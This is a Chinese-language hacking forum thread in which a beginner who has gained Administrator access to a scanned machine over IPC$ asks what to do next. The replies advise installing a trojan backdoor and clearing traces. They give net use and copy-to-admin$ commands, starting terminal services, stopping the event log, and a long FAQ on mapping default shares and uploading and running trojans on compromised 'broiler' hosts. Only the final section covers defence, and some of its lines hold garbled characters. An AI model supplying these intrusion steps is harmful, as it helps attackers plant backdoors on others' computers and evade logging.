论坛: 菜鸟乐园 标题: 拿到ADMINISTRATOR 权限后? 复制本贴地址    
作者: dupi [dupi]    论坛用户   登录
我扫了一台机 用net use 连上了用户名是ADMINISTRATOR
没有任何共享 我能干什么?

地主 发表时间: 02/06 13:49

回复: baboo [baboo]   论坛用户   登录
你有密码吗?有的话不是已经控制这台电脑了?那加个木马,给自己一个后门,然后打里一下现场就可以了吧

B1层 发表时间: 02/06 13:55

回复: dupi [dupi]   论坛用户   登录
有 就是连上了 但是不知道怎么传木马上去 

B2层 发表时间: 02/06 14:02

回复: sgpeng [sgpeng]   论坛用户   登录
对头!

B3层 发表时间: 02/06 14:02

回复: tsn_baby [tsn_baby]   论坛用户   登录
那么因该想想映射他的盘了!成功后就是你cool了!

B4层 发表时间: 02/06 15:13

回复: lyice [lyice]   论坛用户   登录
有很多关于此类的文章!这是我的用法
net use \\xx.xx.xx.xx\ipc$ "adminpass" /user:Administrator
copy c:\xx.exe \\xx.xx.xx.xx\admin$ 这样就可以了xx.exe 复制到机器c:\winnt\system32上
后者最好了
net start termservice 启动win2k的终端控制  (哈哈推荐)

net start workstation 打开net use 功能

net start lanmanserver 打开ipc

net start eventlog 启动日志(你不会那么傻吧!stop)

net start schedule 打开计划(at)

net start server 共享

B5层 发表时间: 02/06 15:17

回复: vishx [vishx]   论坛用户   登录
难到你用IPC只想看到对方的共享吗?靠~`看远点吧

B6层 发表时间: 02/06 16:23

回复: lyice [lyice]   论坛用户   登录
我么?

B7层 发表时间: 02/06 16:26

回复: vishx [vishx]   论坛用户   登录
我说的楼主

B8层 发表时间: 02/06 16:27

回复: lyice [lyice]   论坛用户   登录
hehe 

B9层 发表时间: 02/06 18:07

回复: dupi [dupi]   论坛用户   登录
不好意思让大家失望了 还有什么办法说说吗

B10层 发表时间: 02/06 20:52

回复: vishx [vishx]   论坛用户   登录
1,怎样建立空连接,它有什么用? 
答:使用命令 net use \\IP\ipc$ "" /user:"" 就可以简单地和目标建立一个空连接(需要目标开放ipc$)。 
对于NT,在默认安全设置下,借助空连接可以列举目标用户、共享,访问everyone权限的共享,访问小部分注册表等,没有什么利用价值。对2000作用就更小了。而且实现也不方便,需借助工具。如果你不理解“没用”的东西为什么还会存在,就看看“专业”的解释吧: 
在NT/2000下的空连接 http://www.3389.net/bbs/dispbbs.asp?boardID=22&RootID=3424&ID=3424&page=1: 
解剖WIN2K下的空会话 http://www.sandflee.net/txt/list.asp?id=117 ; 
2,为什么我连不上IPC$? 
答:1,只有nt/2000/xp及以上系统才可以建立ipc$。如果你用的是98/me是没有该功能的。 
2,确认你的命令没有打错。正确的命令是: net use \\目标IP\ipc$ "密码" /user:"用户名" 
注意别多了或少了空格。当用户名和密码中不包含空格时两边的双引号可以省略。空密码用""表示。 
3,根据返回的错误号分析原因: 
错误号5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 
错误号51,Windows 无法找到网络路径 : 网络有问题; 
错误号53,找不到网络路径 : ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 
错误号67,找不到网络名 : 你的lanmanworkstation服务未启动;目标删除了ipc$; 
错误号1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个ipc$,请删除再连。 
错误号1326,未知的用户名或错误密码 : 原因很明显了; 
错误号1792,试图登录,但是网络登录服务没有启动 : 目标NetLogon服务未启动。(连接域控会出现此情况) 
错误号2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 
4,关于ipc$连不上的问题比较复杂,没有总结出一个统一的认识,我在肉鸡上实验有时会得出矛盾的结论,十分棘手。 而且知道了问题所在,如果没有用其他办法获得shell,很多问题依然不能解决。问题过于细致后就不适合在本文章里探讨了。 各位看着办吧,呵呵。 
5,怎样打开目标的IPC$? 
答:首先你需要获得一个不依赖于ipc$的shell,比如sql的cmd扩展、telnet、木马。当然,这shell必须是admin权限的。然后你可以使用shell执行命令 net share ipc$ 来开放目标的ipc$。从上一问题可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不知道怎么做的请看net命令的用法)。还是不行的话(比如有防火墙,杀不了)建议放弃。 
6,怎样映射和访问默认共享? 
答:使用命令 net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘,其他盘类推。 
如果已经和目标建立了ipc$,则可以直接用IP加盘符加$访问。比如 copy muma.exe \\IP\d$\path\muma.exe 。或者再映射也可以,只是不用用户名和密码了:net use y: \\IP\d$ 。然后 copy muma.exe y:\path\muma.exe 。当路径中包含空格时,须用""将路径全引住。 
7,如何删除映射和ipc$连接? 
答:用命令 net use \\IP\ipc$ /del 删除和一个目标的ipc$连接。 
用命令 net use z: /del 删除映射的z盘,其他盘类推。 
用命令 net use * /del 删除全部。会有提示要求按y确认。 
8,连上ipc$然后我能做什么? 
答:能使用管理员权限的帐号成功和目标连接ipc$,表示你可以和对方系统做深入“交流”了。你可以使用各种命令行方式的工具(比如pstools系列、Win2000SrvReskit、telnethack等)获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开你就帮他开),你就可以上传木马并运行。也可以用tftp、ftp的办法上传。像dwrcc、VNC、RemoteAdmin等工具(木马)还具有直接控屏的功能。如果是2000server,还可以考虑开启终端服务方便控制。这里提到的工具的使用,请看自带的说明或相关教程。 
9,怎样防止别人用ips$和默认共享入侵我? 
答:A、一种办法是把ipc$和默认共享都删除了。但重起后还会有。这就需要改注册表。 
1,先把已有的删除 
net share ipc$ /del 
net share admin$ /del 
net share c$ /del 
…………(有几个删几个) 
2,禁止别人空连接 
���� ���� 首先运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous(DWORD)的键值改为:00000002。 
���� �� 3,禁止自动打开默认共享 
���� ���� 对于server版,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。 
对于pro版,则是[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。 
如果上面所说的主键不存在,就新建一个再改键值。 
B、另一种是关闭ipc$和默认共享依赖的服务(不推荐) 
net stop lanmanserver 
可能会有提示说,XXX服务也会关闭是否继续。因为还有些次要的服务依赖于lanmanserver。一般情况按y继续就可以了。 
C、最简单的办法是设置复杂密码,防止通过ipc$穷举密码。但如果你有其他漏洞,ipc$将为进一步入侵提供方便。 
D、还有一个办法就是装防火墙,或者端口过滤。 



B11层 发表时间: 02/07 13:59

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号